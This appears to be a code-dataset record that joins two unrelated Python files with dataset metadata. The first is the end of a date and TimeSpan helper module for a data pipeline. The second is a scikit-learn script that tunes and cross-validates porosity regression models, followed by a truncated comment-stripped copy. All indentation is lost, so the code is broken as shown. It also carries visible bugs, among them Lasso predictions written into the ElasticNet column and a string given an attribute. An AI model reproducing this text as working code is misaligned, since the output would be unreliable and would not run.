fullpath = os.path.join(self.path, subpath)
for f in sorted(fs.listdir(fullpath)):
if fnmatch.fnmatch(f, pattern):
yield os.path.join(subpath, f)
count += 1
if not count:
sys.stderr.write(f'*** No files matching {pattern} found in {fullpath}\n')
def make_ordinal(n):
n = int(n)
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return f'{n}{suffix}'
def timespan_for_century(century, narrow=False, inclusive=False, **kwargs):
'''
Given a integer representing a century (e.g. 17 for the 17th century), return a
TimeSpan object for the bounds of that century.
If `narrow` is True, the bounding properties will be `end_of_the_begin` and
`begin_of_the_end`; otherwise they will be `begin_of_the_begin` and `end_of_the_end`.
'''
ord = make_ordinal(century)
ts = model.TimeSpan(ident='', label=f'{ord} century')
from_year = 100 * (century-1)
to_year = from_year + 100
if narrow:
ts.end_of_the_begin = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (from_year, 1, 1, 0, 0, 0)
ts.begin_of_the_end = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (to_year, 1, 1, 0, 0, 0)
else:
ts.begin_of_the_begin = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (from_year, 1, 1, 0, 0, 0)
ts.end_of_the_end = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (to_year, 1, 1, 0, 0, 0)
return ts
def dates_for_century(century):
'''
Given a integer representing a century (e.g. 17 for the 17th century), return a
tuple of dates for the bounds of that century.
'''
ord = make_ordinal(century)
ts = model.TimeSpan(ident='', label=f'{ord} century')
from_year = 100 * (century-1)
to_year = from_year + 100
begin = datetime.datetime(from_year, 1, 1)
end = datetime.datetime(to_year, 1, 1)
return (begin, end)
def timespan_before(after):
ts = model.TimeSpan(ident='')
try:
ts.end_of_the_end = after.begin_of_the_begin
with suppress(AttributeError):
l = f'Before {after._label}'
l.identified_by = model.Name(ident='', content=l)
ts._label = l
return ts
except AttributeError:
return None
def timespan_after(before):
ts = model.TimeSpan(ident='')
try:
ts.begin_of_the_begin = before.end_of_the_end
with suppress(AttributeError):
l = f'After {before._label}'
l.identified_by = model.Name(ident='', content=l)
ts._label = l
return ts
except AttributeError:
return None
def replace_key_pattern(pat, rep, value):
r = re.compile(pat)
d = {}
for k, v in value.items():
m = r.search(k)
if m:
d[k.replace(m.group(1), rep, 1)] = v
else:
d[k] = v
return d
def strip_key_prefix(prefix, value):
'''
Strip the given `prefix` string from the beginning of all keys in the supplied `value`
dict, returning a copy of `value` with the new keys.
'''
d = {}
for k, v in value.items():
if k.startswith(prefix):
d[k.replace(prefix, '', 1)] = v
else:
d[k] = v
return d
def label_for_timespan_range(begin, end, inclusive=False):
'''
Returns a human-readable string for labeling the timespan with the given bounds.
The {inclusive} indicates if the upper bound given by {end} is inclusive or exclusive.
If {end} is exclusive, the label will take this into account in creating a
human-readable string. For example, if the upper bound was '2019-12-01', exclusive,
the human-readable label should indicate the timespan ending at the end of November.
'''
if begin and end:
pass
elif begin:
return f'{begin} onwards'
elif end:
return f'up to {end}'
if begin == end:
return begin
if isinstance(begin, datetime.datetime):
begin = begin.strftime("%Y-%m-%d")
if isinstance(end, datetime.datetime):
end = end.strftime("%Y-%m-%d")
orig_begin = begin
orig_end = end
if begin.count('-') != 2:
if not inclusive:
raise Exception(f'truncated date strings must operate in inclusive mode in label_for_timespan_range: {begin}')
begin = implode_date(dict(zip(('year', 'month', 'day'), (begin.split('-', 3) + ['', '', ''])[:3])), clamp='begin')
if end.count('-') != 2:
if not inclusive:
raise Exception(f'truncated date strings must operate in inclusive mode in label_for_timespan_range: {end}')
end = implode_date(dict(zip(('year', 'month', 'day'), (end.split('-', 3) + ['', '', ''])[:3])), clamp='end' if inclusive else 'eoe')
beginparts = list(map(int, begin.split('-')))
endparts = list(map(int, end.split('-')))
from_y, from_m, from_d = beginparts
to_y, to_m, to_d = endparts
if inclusive:
maxday = calendar.monthrange(to_y, to_m)[1]
if from_y == to_y and from_m == to_m and from_d == 1 and to_d == maxday:
# 1 month range
return '%04d-%02d' % (from_y, from_m)
elif from_y == to_y and from_m == 1 and to_m == 12 and from_d == 1 and to_d == 31:
# 1 year range
return str(from_y)
else:
return f'{orig_begin} to {orig_end}'
else:
if from_y == to_y and from_m == to_m and from_d == to_d - 1:
# 1 day range
return begin
elif from_y == to_y and from_m == to_m - 1 and from_d == to_d and to_d == 1:
# 1 month range
return '%04d-%02d' % (from_y, from_m)
elif from_y == to_y - 1 and from_m == to_m and to_m == 1 and from_d == to_d and to_d == 1:
# 1 year range
return str(from_y)
else:
to_d -= 1
if to_d == 0:
to_m -= 1
if to_m == 0:
to_m = 12
to_y -= 1
to_d = calendar.monthrange(to_y, to_m)[1]
end = '%04d-%02d-%02d' % (to_y, to_m, to_d)
return f'{begin} to {end}'
def exploded_date_has_uncertainty(date_tuple):
year, month, day = date_tuple
try:
year = int(year)
month = int(month)
day = int(day)
if month == 0 or day == 0:
return True
except:
pass
return False
def timespan_from_bound_components(data:dict, begin_prefix:str='', begin_clamp:str=None, end_prefix:str='', end_clamp:str=None):
begin_tuple = extract_date_tuple(data, begin_prefix)
end_tuple = extract_date_tuple(data, end_prefix)
uncertain_dates = [exploded_date_has_uncertainty(t) for t in (begin_tuple, end_tuple)]
uncertain_date = any(uncertain_dates)
uncertain_tuple = begin_tuple if uncertain_dates[0] else end_tuple
if uncertain_date:
begin = implode_uncertain_date_tuple(uncertain_tuple, clamp=begin_clamp)
end = implode_uncertain_date_tuple(uncertain_tuple, clamp=end_clamp)
# # for dates with a '00' for month, the end day will already be
# incremented by implode_uncertain_date_tuple with end_clamp='eoe'
inclusive = end_clamp != 'eoe'
ts = timespan_from_outer_bounds(
begin=begin,
end=end,
inclusive=inclusive
)
else:
begin = implode_date_tuple(begin_tuple, clamp=begin_clamp)
end = implode_date_tuple(end_tuple, clamp=end_clamp)
# we use inclusive=False here, because clamping in the implode_date_tuple
# call will have already handled adjusting the date to handle the 'eoe'
# case (unlike the if case above, where we have to base inclusivity on
# the clamp value)
ts = timespan_from_outer_bounds(
begin=begin,
end=end,
inclusive=False
)
if end_clamp == 'eoe':
end_label = implode_date_tuple(end_tuple, clamp='end')
else:
end_label = end
if uncertain_date:
# attach an Identifier to the timespan that includes the original
# verbatim string values that include the '00' field values
ident_parts = []
begin_str = '-'.join([c for c in begin_tuple if len(c)])
end_str = '-'.join([c for c in end_tuple if len(c)])
uncertain_str = begin_str if uncertain_dates[0] else end_str
# Note: This will use the verbatim string from the uncertain date
# (either begin or end).
ts.identified_by = model.Name(ident='', content=f'{uncertain_str}')
else:
if begin and end:
ts.identified_by = model.Name(ident='', content=f'{begin} to {end_label}')
elif begin:
ts.identified_by = model.Name(ident='', content=f'{begin} onwards')
elif end:
ts.identified_by = model.Name(ident='', content=f'up to {end_label}')
return ts, begin, end
def timespan_from_outer_bounds(begin=None, end=None, inclusive=False):
'''
Return a `TimeSpan` based on the (optional) `begin` and `end` date strings.
If both `begin` and `end` are `None`, returns `None`.
'''
if begin or end:
ts = model.TimeSpan(ident='')
ts._label = label_for_timespan_range(begin, end, inclusive=inclusive)
if begin is not None:
try:
if not isinstance(begin, datetime.datetime):
begin = dateutil.parser.parse(begin)
begin = begin.strftime("%Y-%m-%dT%H:%M:%SZ")
ts.begin_of_the_begin = begin
except ValueError:
warnings.warn(f'*** failed to parse begin date: {begin}')
raise
if end is not None:
try:
if not isinstance(end, datetime.datetime):
end = dateutil.parser.parse(end)
if inclusive:
end += datetime.timedelta(days=1)
end = end.strftime("%Y-%m-%dT%H:%M:%SZ")
ts.end_of_the_end = end
except ValueError:
warnings.warn(f'*** failed to parse end date: {end}')
return ts
return None
class CaseFoldingSet(set):
def __init__(self, iterable):
super().__init__(self)
for v in iterable:
self.add(v)
def __and__(self, value):
return CaseFoldingSet({s for s in value if s in self})
def __or__(self, value):
s = CaseFoldingSet({})
for v in self:
s.add(v)
for v in value:
s.add(v)
return s
def add(self, v):
super().add(v.casefold())
def remove(self, v):
super().remove(v.casefold())
def __contains__(self, v):
return super().__contains__(v.casefold())
def intersects(self, values):
if isinstance(values, CaseFoldingSet):
l = set(self)
r = set(values)
return l & r
else:
for v in values:
if v in self:
return True
return False
def truncate_with_ellipsis(s, length=100):
'''
If the string is too long to represent as a title-like identifier, return a new,
truncated string with a trailing ellipsis that can be used as a title (with the
assumption that the long original value will be represented as a more suitable
string such as a description).
'''
if not isinstance(s, str):
return None
if len(s) <= length:
return None
shorter = ' '.join(s[:length].split(' ')[0:-1]) + '…'
if len(shorter) == 1:
# breaking on spaces did not yield a shorter string;
# {s} must start with at least 100 non-space characters
shorter = s[:length-1] + '…'
return shorter
class GraphListSource:
'''
Act as a bonobo graph source node for a set of crom objects.
Yields the supplied objects wrapped in data dicts.
'''
def __init__(self, values, *args, **kwargs):
super().__init__(*args, **kwargs)
self.values = values
def __call__(self):
for v in self.values:
yield add_crom_data({}, v)
def rename_keys(mapping:dict):
return lambda d, p: {mapping[k] if k in mapping else k: v for k, v in d.items()}
def _as_list(data):
if isinstance(data, list):
return data
elif data is None:
return []
else:
return [data]
| en | 0.811378 | # Dimension = namedtuple("Dimension", [ # 'value', # numeric value # 'unit', # unit # 'which' # e.g. width, height, ... # ]) # Simply yield the value that is passed as an argument. This is trivial, but necessary for use in constructing some bonobo graphs. For example, if two already instantiated graph chains need to be connected, one being used as input to the other, bonobo does not allow this: `graph.add_chain(_input=prefix.output, _output=suffix.input)` Instead, the `add_chain` call requires at least one graph node to be added. Hence: `graph.add_chain(identity, _input=prefix.output, _output=suffix.input)` Given a dict `data` and a string `prefix`, extract year, month, and day elements from `data` (e.g. '{prefix}year', '{prefix}month', and '{prefix}day'), and return them as a tuple. Given a date string tuple `(year, month, day)`, return an ISO 8601 date string ('YYYY-MM-DD'). If the day, or day and month elements are missing, may also return a year-month ('YYYY-MM') or year ('YYYY') string. If `clamp='begin'` and a year value is found, the resulting date string will use the earliest valid value for any field (month or day) that is not present or false. For example, '1800-02' would become '1800-02-01'. If `clamp='end'`, clamping occurs using the latest valid values. For example, '1800-02' would become '1800-02-28'. If `clamp='eoe'` ('end of the end'), clamping occurs using the first value that is *not* valid. That is, the returned value may be used as an exclusive endpoint for a date range. For example, '1800-02' would become '1800-03-01'. Similar to `implode_date_tuple`, returns an ISO 8601 date string based on the supplied date tuple. However, this method will handle date tuples with zero-valued day or month fields. # keep the day value if there's month uncertainty # keep the day value if there's month uncertainty Given a dict `data` and a string `prefix`, extract year, month, and day elements from `data` (with `extract_date_tuple`), and return an ISO 8601 date string ('YYYY-MM-DD') using `implode_date_tuple`. # NOTE: It's important that these attribute-based identity rules are # based on crom classes that will not be top-level resources in Arches. # That is, they must only be referenced from within a top-level # resource, and not across resource boundaries. This is because during a # merge, only one value will be presersved for non-multiple properties # that differ between input objects such as `id` (and so anything # referencing an `id` value that is dropped will be left with a dangling # pointer). # This is similar to `self.attribute_based_identity`, but instead of being # based on the `type` of the object, it is based on the meta-type value # (the `obj.classified_as.classified_as` value) # of the object # instead of mapping to a tuple of classes, `self._metatyped_attribute_based_identity` # maps to a list of sets of URIs (the set of classifications that must be present to be # interpreted as a member of the class) # print(f'merge called with {1+len(to_merge)} objects: ({obj}, {to_merge})') # drop the Unknown physical dimension (300055642) # print('*** TODO: calling setattr(_, "type") on crom objects throws; skipping') # there are values in the new objects that have to be merged with existing identifiable values # clear out all the existing values # in case the values cannot be sorted # unidentified_value = sorted(unidentified)[0] # setattr(obj, p, unidentified_value) # there are no identifiable values in the new objects, so we can just append them # in case the values cannot be sorted Given a `dict` representing an some object, extract an array of `dict` values from the `key` member. To each of the extracted dictionaries, add a 'parent_data' key with the value of the original dictionary. Yield each extracted dictionary. Sets the __name__ property to include the relevant options so that when the bonobo graph is serialized as a GraphViz document, different objects can be visually differentiated. Given a `dict` representing an some object, extract the `key` member (a dict). To the extracted dictionaries, add a 'parent_data' key with the value of the original dictionary. Yield the extracted dictionary. Sets the __name__ property to include the relevant options so that when the bonobo graph is serialized as a GraphViz document, different objects can be visually differentiated. Given a path and a pattern, yield the names of all files in the path that match the pattern. The filesystem instance to use. # type: str Sets the __name__ property to include the relevant options so that when the bonobo graph is serialized as a GraphViz document, different objects can be visually differentiated. # print(repr(self.pattern)) Given a integer representing a century (e.g. 17 for the 17th century), return a TimeSpan object for the bounds of that century. If `narrow` is True, the bounding properties will be `end_of_the_begin` and `begin_of_the_end`; otherwise they will be `begin_of_the_begin` and `end_of_the_end`. Given a integer representing a century (e.g. 17 for the 17th century), return a tuple of dates for the bounds of that century. Strip the given `prefix` string from the beginning of all keys in the supplied `value` dict, returning a copy of `value` with the new keys. Returns a human-readable string for labeling the timespan with the given bounds. The {inclusive} indicates if the upper bound given by {end} is inclusive or exclusive. If {end} is exclusive, the label will take this into account in creating a human-readable string. For example, if the upper bound was '2019-12-01', exclusive, the human-readable label should indicate the timespan ending at the end of November. # 1 month range # 1 year range # 1 day range # 1 month range # 1 year range # # for dates with a '00' for month, the end day will already be # incremented by implode_uncertain_date_tuple with end_clamp='eoe' # we use inclusive=False here, because clamping in the implode_date_tuple # call will have already handled adjusting the date to handle the 'eoe' # case (unlike the if case above, where we have to base inclusivity on # the clamp value) # attach an Identifier to the timespan that includes the original # verbatim string values that include the '00' field values # Note: This will use the verbatim string from the uncertain date # (either begin or end). Return a `TimeSpan` based on the (optional) `begin` and `end` date strings. If both `begin` and `end` are `None`, returns `None`. If the string is too long to represent as a title-like identifier, return a new, truncated string with a trailing ellipsis that can be used as a title (with the assumption that the long original value will be represented as a more suitable string such as a description). # breaking on spaces did not yield a shorter string; # {s} must start with at least 100 non-space characters Act as a bonobo graph source node for a set of crom objects. Yields the supplied objects wrapped in data dicts. | 2.673648 | 3 |
code/model_training.py | lucaskup/PorosityAnalisys | 0 | 6632505 | <gh_stars>0
import seaborn as sns
from pathlib import Path
import pandas as pd
import numpy as np
import copy
from scipy.stats import t
from sklearn.model_selection import RepeatedKFold
from sklearn.preprocessing import MinMaxScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.neural_network import MLPRegressor
from sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn.model_selection import cross_validate, KFold, GridSearchCV
from joblib import dump, load
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 400
# Import the data
dataset = pd.read_csv('../results/featureSelection/featureSelectedData.csv',
index_col=0)
X = dataset.values[:, :-1].astype(np.float64)
Y = dataset['Porosity (%)'].values.astype(np.float64)
mmY = MinMaxScaler()
Y = mmY.fit_transform(Y.reshape(-1, 1)).ravel()
# Auxiliary Functions
n_split = len(X)
kfold_indexes = list(KFold(n_split, shuffle=True).split(X))
def getKfoldIndexes():
return copy.deepcopy(kfold_indexes)
def evaluate_model(model, model_name, save_results=False):
'''
Evaluates the model using LOOCV and creates a file with the results.
Parameters:
model (sklearn.model): Sklearn model
model_name (int): Name of the algorithm
save_results (bool): save results to a file
Returns:
scores (DataFrame): Results of LOOCV
'''
# Setup directory to save results
# Creates the directory to save the results
pathToSaveModelEval = None
pathToSaveModelsDump = None
if save_results:
pathToSaveModelEval = f'../results/modelTrained/{model_name}'
pathToSaveModelsDump = pathToSaveModelEval+'/trainedModels'
Path(pathToSaveModelsDump).mkdir(parents=True, exist_ok=True)
scores = cross_validate(model,
X,
y=np.ravel(Y),
cv=getKfoldIndexes(),
scoring={'mse': 'neg_mean_squared_error'},
return_estimator=True)
yArray, yHatArray = computes_YHat(
scores, pathToSaveModelsDump, model_name=model_name)
predNPArray = np.concatenate((yArray, yHatArray),
axis=1)
dfColumnsExport = ['Y', 'YHat']
predDf = pd.DataFrame(predNPArray, columns=dfColumnsExport)
predDf.to_csv(f'{pathToSaveModelEval}/predictions.csv',
sep=';',
decimal='.',
index=False)
r2Result, mseResult, maeResult = compute_metrics(yArray, yHatArray)
textToPlot = f'{model_name}\n' \
f'R2: {r2Result:7.4f}\n' \
f'MSE: {mseResult:7.4f}\n' \
f'MAE: {maeResult:7.4f}'
scores['yHat'] = yHatArray
scores['y'] = yArray
scores['R2'] = r2Result
scores['MSE'] = mseResult
scores['MAE'] = maeResult
scores['modelName'] = model_name
print(textToPlot)
return scores
def computes_YHat(cv_scores,
path_to_save_models=None,
model_name=None):
'''
Uses all the estimators from LOOCV to make yHat estimations
Parameters:
cv_scores (DataFrame): The return from a cross validation
path_to_save_models (String): Path to save model dump
model_name (String): Name of the model
Returns:
y, y_hat (NumpyArray, NumpyArray): Ground Truth and Prediction
'''
resultList = cv_scores['estimator']
cross_val_indexes = getKfoldIndexes()
y_hat = []
y = []
# index of the for loop
i = 0
for est in resultList:
x_temp = cross_val_indexes[i][1]
if len(x_temp) > 0:
ground_truth = Y[x_temp]
x_temp = X[x_temp]
pred = est.predict(x_temp)
y_hat = y_hat + list(pred)
y = y + list(ground_truth.reshape(1, -1)[0])
dump(
est, f'{path_to_save_models}/{model_name}_LOOCV_FOLD_{i}.joblib')
else:
print('Problem in estimation')
i = i + 1
y = mmY.inverse_transform(
np.asarray(y).reshape(-1, 1))
y_hat = mmY.inverse_transform(np.asarray(y_hat).reshape(-1, 1))
return y, y_hat
def compute_metrics(y_array, y_hat_array):
'''
Returns metrics for the estimations passed as arguments.
Parameters:
y_array (NumpyArray): Ground Truth
y_hat_array (NumpyArray): Model Estimations
Returns:
(mae, r2, mse) (float, float, float): Metrics calculated
'''
mae = mean_absolute_error(y_array, y_hat_array)
r2 = r2_score(y_array, y_hat_array)
mse = mean_squared_error(y_array, y_hat_array)
return r2, mse, mae
def create_graphs(y_array, y_hat_array,
model_name, path_save_evaluation=None):
'''
Creates scatter and residual plot of predictions passed in the
first two parameters.
Parameters:
y_array (NumpyArray): Ground Truth value
y_hat_array (NumpyArray): Estimated Values
model_name (String): Name of the models
path_save_evaluation (String): Path to save graphs and
metrics
Returns:
None
'''
plt.clf()
plt.style.use(['seaborn-ticks'])
plt.figure(figsize=(6.5, 4.1)) # 4.75))
# Plots the estimatives
plt.plot(y_array, y_hat_array, "o")
# Plots a black line for comparation purpose
_, xmax = plt.xlim()
plt.plot([0, xmax], [0, xmax], 'k-')
y0, ymax = plt.ylim()
yDistanceY0_yMax = ymax - y0
# Plots a linear fit between prediction and actual value
linear = LinearRegression()
linear.fit(y_array, y_hat_array)
plt.plot(y_array, linear.predict(y_array), '-', color='red')
r2, mse, mae = compute_metrics(y_array, y_hat_array)
residual_array = y_array - y_hat_array
text_to_plot = f'R2: {r2:7.4f}\n' \
f'MSE: {mse:7.4f}\n' \
f'MAE: {mae:7.4f}'
print(text_to_plot)
plt.text(0, ymax - yDistanceY0_yMax * 0.2,
text_to_plot,
bbox=dict(facecolor='gray', alpha=0.5),
family='monospace')
# plt.title(modelName)
plt.grid(True)
plt.xlabel('Laboratory Determined Porosity [%]')
plt.ylabel(model_name+' Estimated Porosity [%]')
if path_save_evaluation:
# Save Graph
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_save_evaluation}/scatterPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
# Save file metrics
with open(f'{path_save_evaluation}/metrics.txt',
mode='w') as f:
f.write(f'R2: {r2}\n')
f.write(f'MAE: {mae}\n')
f.write(f'MSE: {mse}\n')
f.write(f'Residuals: {residual_array}\n')
f.write(f'Y: {y_array}\n')
f.write(f'YHat: {y_hat_array}\n')
plt.show()
create_residual_plot(model_name, residual_array,
path_to_save=path_save_evaluation)
def create_residual_plot(model_name,
residual_list,
path_to_save=None):
'''
Creates the residual plot histogram.
Parameters:
model_name (String): Name of the model in the graph
residual_list (NumpyArray): Residuals of the estimation
path_to_save (String): Path to save the residuals graph
Returns:
None
'''
plt.clf()
sns.set(style="ticks")
_, (ax_box, ax_hist) = plt.subplots(2,
sharex=True,
gridspec_kw={
"height_ratios": (.15, .85)},
figsize=(6.5, 4.1))
ax_box.set_xlim((-15, 15))
ax_hist.set_xlim((-15, 15))
ax_hist.set_ylim((0, 13))
ax_hist.set_xlabel(f'{model_name} Porosity Estimation Residual')
ax_hist.set_ylabel('Frequency')
customBins = np.arange(-15.5, 15.5, 1)
ax_hist.set_yticks(np.arange(0, 14, 1))
ax_hist.set_xticks(np.arange(-15, 16, 3))
sns.boxplot(x=residual_list, ax=ax_box)
sns.histplot(data=residual_list,
bins=customBins,
kde=False, ax=ax_hist, legend=False, edgecolor="k", linewidth=1)
ax_box.set(yticks=[])
sns.despine(ax=ax_hist)
sns.despine(ax=ax_box, left=True)
if path_to_save is not None:
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_to_save}/residualsPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
plt.show()
def grid_search_hyperparameters(grid_parameters, model_name, model, save_results=False):
'''
Does a 10 repetition 10-fold cross validation grid search to
select the best model in the parameter grid
Parameters:
grid_parameters (Dictionary): Grid parameters to use
in the model search
model_name (String): Name of the model in the graph
model (sklearn.model): Algorithm to use to train
the model
save_results (bool): Save LOOCV results to a file
Returns:
best_params (Dictionary): Best parameters
'''
cv = RepeatedKFold(
n_splits=10, n_repeats=10, random_state=0
)
gsCV = GridSearchCV(model,
grid_parameters,
cv=cv,
n_jobs=-1,
scoring='neg_mean_squared_error')
gsCV.fit(X, Y)
results_df = pd.DataFrame(gsCV.cv_results_)
results_df = results_df.sort_values(by=['rank_test_score'])
results_df = (
results_df
.set_index(results_df["params"].apply(
lambda x: "_".join(f'{key}:{val}' for key, val in x.items()))
)
.rename_axis('model')
)
print(results_df[
['rank_test_score', 'mean_test_score', 'std_test_score']
])
if save_results:
results_df.drop('params',
axis=1).to_csv(f'../results/modelTrained/{model_name}/GridSearchCV.csv',
decimal='.',
sep=';')
print(
f'Best {model_name}:\n Score > {gsCV.best_score_}\n Params > {gsCV.best_params_}')
return gsCV.best_params_
# Lasso
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Lasso Reg',
Lasso(),
save_results=True)
# Ridge
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Ridge Reg',
Ridge(),
save_results=True)
# ElasticNet
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'l1_ratio': [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'ElasticNet',
ElasticNet(),
save_results=True)
# kNN
covParam = np.cov(X.astype(np.float32))
invCovParam = np.linalg.pinv(covParam)
grid_parameters = [{'algorithm': ['auto'],
'metric': ['minkowski'],
'n_neighbors': [1, 2, 3, 4, 5]},
{'algorithm': ['brute'],
'metric': ['mahalanobis'],
'n_neighbors': [1, 2, 3, 4, 5],
'metric_params': [{'V': covParam,
'VI': invCovParam}]}]
grid_search_hyperparameters(grid_parameters,
'KNN',
KNeighborsRegressor(),
save_results=True)
# SVR Model
grid_parameters = {'C': [0.1, 1, 10, 100, 1000],
'gamma': ['auto', 5, 1, 0.1, 0.01, 0.001, 0.0001],
'kernel': ['rbf'],
'epsilon': [0.1, 0.01, 0.05]}
grid_search_hyperparameters(grid_parameters,
'SVR',
SVR(),
save_results=True)
# RF
grid_parameters = {'n_estimators': [10, 50, 100, 200, 500],
'criterion': ['mse', 'mae']}
grid_search_hyperparameters(grid_parameters,
'RF',
RandomForestRegressor(),
save_results=True)
# sorted(sklearn.metrics.SCORERS.keys())
# MLP
grid_parameters = {'hidden_layer_sizes': [(5, 5), (15, 10),
(20, 15, 10),
(20, 15, 15, 10),
(10, 5, 5, 5),
(20, 15, 10, 5)],
'activation': ['relu'],
'solver': ['adam'],
'max_iter': [1250, 1600, 2000, 2500, 3000],
'alpha': [0.01, 0.001, 0.0001],
'learning_rate': ['constant', 'adaptive'],
'batch_size': [1, 2, 3],
'learning_rate_init': [0.01, 0.001],
'early_stopping': [False]
}
grid_search_hyperparameters(grid_parameters,
'MLP',
MLPRegressor(),
save_results=True)
###################################
# Training and evaluation of models
# Linear Regression
linear = LinearRegression()
linearEval = evaluate_model(linear, 'Linear Reg', save_results=True)
# Ridge Regression
ridge = Ridge(alpha=0.1, max_iter=100)
ridgeEval = evaluate_model(ridge, 'Ridge Reg', save_results=True)
# Lasso Regression
lasso = Lasso(alpha=0.00025, max_iter=1000)
lassoEval = evaluate_model(lasso, 'Lasso Reg', save_results=True)
# ElasticNet
elasticNet = ElasticNet(alpha=0.00025, l1_ratio=1, max_iter=1000)
elasticNetEval = evaluate_model(elasticNet, 'ElasticNet', save_results=True)
'''
important_coeficients = []
coef = []
for est in elasticNetEval['estimator']:
vec = np.vectorize(lambda x: 0 if x == 0 else 1)
print(vec(est.coef_))
coef.append(est.coef_)
important_coeficients.append(vec(est.coef_))
important_coef_np = np.asfarray(important_coeficients)
coef = np.asarray(coef)
important_columns = vec(important_coef_np.sum(axis=0)).nonzero()[0]
teste = coef[:, important_columns]
plt.boxplot(teste[:, :])
plt.show()
dataset.columns[important_columns]
'''
# KNN Model Evaluation
knn = KNeighborsRegressor(n_neighbors=2,
metric='minkowski')
knnEval = evaluate_model(knn, 'KNN', save_results=True)
# SVR Model Evaluation
svr = SVR(gamma=5,
C=10,
epsilon=0.01,
kernel='rbf')
svrEval = evaluate_model(svr, 'SVR', save_results=True)
# Random Forest
forest = RandomForestRegressor(n_estimators=500,
criterion='mae')
forestEval = evaluate_model(forest, 'RF', save_results=True)
# MLP Model Evaluation
mlp = MLPRegressor(max_iter=3000,
hidden_layer_sizes=(20, 15, 15, 10),
activation='relu',
alpha=0.001,
learning_rate='adaptive',
learning_rate_init=0.001,
batch_size=3,
solver='adam')
mlpEval = evaluate_model(mlp, 'MLP', save_results=True)
# Compile all the predictions in the same CSV file
crossValIndexes = getKfoldIndexes()
crossValIndexes = list(map(lambda x: x[1][0], crossValIndexes))
wavelengthColumns = list(dataset.columns[:-1])
yHatTable = np.concatenate((X[crossValIndexes], linearEval['y'], linearEval['yHat'], ridgeEval['yHat'], lassoEval['yHat'],
lassoEval['yHat'], knnEval['yHat'], svrEval['yHat'], forestEval['yHat'], mlpEval['yHat']),
axis=1)
dfColumnsExport = wavelengthColumns + ['Y', 'Linear', 'Ridge', 'Lasso',
'ElasticNet', 'kNN', 'SVR', 'RF', 'MLP']
yHatDf = pd.DataFrame(yHatTable, columns=dfColumnsExport)
yHatDf.to_csv('../results/modelTrained/completePredictions.csv',
sep=';',
decimal='.',
index=False)
indexColumns = ['modelName', 'R2', 'MSE', 'MAE']
summaryDF = pd.DataFrame(
np.asarray(list(map(lambda x: list(map(lambda index: x[index], indexColumns)),
[linearEval, ridgeEval, lassoEval, elasticNetEval,
knnEval, svrEval, forestEval, mlpEval]))),
columns=indexColumns)
summaryDF.to_csv('../results/modelTrained/summary.csv',
sep=';',
decimal='.',
index=False)
def plot_results():
models = ['Linear Reg', 'Lasso Reg', 'Ridge Reg',
'ElasticNet', 'KNN', 'SVR', 'RF', 'MLP']
for model_name in models:
path_model_data = f'../results/modelTrained/{model_name}'
path_prediction_file = f'{path_model_data}/predictions.csv'
df_prediction_data = pd.read_csv(
path_prediction_file, decimal='.', sep=';')
yArray = df_prediction_data['Y'].values.reshape(-1, 1)
yHatArray = df_prediction_data['YHat'].values.reshape(-1, 1)
create_graphs(yArray, yHatArray, model_name,
path_save_evaluation=path_model_data)
plot_results()
| import seaborn as sns
from pathlib import Path
import pandas as pd
import numpy as np
import copy
from scipy.stats import t
from sklearn.model_selection import RepeatedKFold
from sklearn.preprocessing import MinMaxScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.neural_network import MLPRegressor
from sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn.model_selection import cross_validate, KFold, GridSearchCV
from joblib import dump, load
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 400
# Import the data
dataset = pd.read_csv('../results/featureSelection/featureSelectedData.csv',
index_col=0)
X = dataset.values[:, :-1].astype(np.float64)
Y = dataset['Porosity (%)'].values.astype(np.float64)
mmY = MinMaxScaler()
Y = mmY.fit_transform(Y.reshape(-1, 1)).ravel()
# Auxiliary Functions
n_split = len(X)
kfold_indexes = list(KFold(n_split, shuffle=True).split(X))
def getKfoldIndexes():
return copy.deepcopy(kfold_indexes)
def evaluate_model(model, model_name, save_results=False):
'''
Evaluates the model using LOOCV and creates a file with the results.
Parameters:
model (sklearn.model): Sklearn model
model_name (int): Name of the algorithm
save_results (bool): save results to a file
Returns:
scores (DataFrame): Results of LOOCV
'''
# Setup directory to save results
# Creates the directory to save the results
pathToSaveModelEval = None
pathToSaveModelsDump = None
if save_results:
pathToSaveModelEval = f'../results/modelTrained/{model_name}'
pathToSaveModelsDump = pathToSaveModelEval+'/trainedModels'
Path(pathToSaveModelsDump).mkdir(parents=True, exist_ok=True)
scores = cross_validate(model,
X,
y=np.ravel(Y),
cv=getKfoldIndexes(),
scoring={'mse': 'neg_mean_squared_error'},
return_estimator=True)
yArray, yHatArray = computes_YHat(
scores, pathToSaveModelsDump, model_name=model_name)
predNPArray = np.concatenate((yArray, yHatArray),
axis=1)
dfColumnsExport = ['Y', 'YHat']
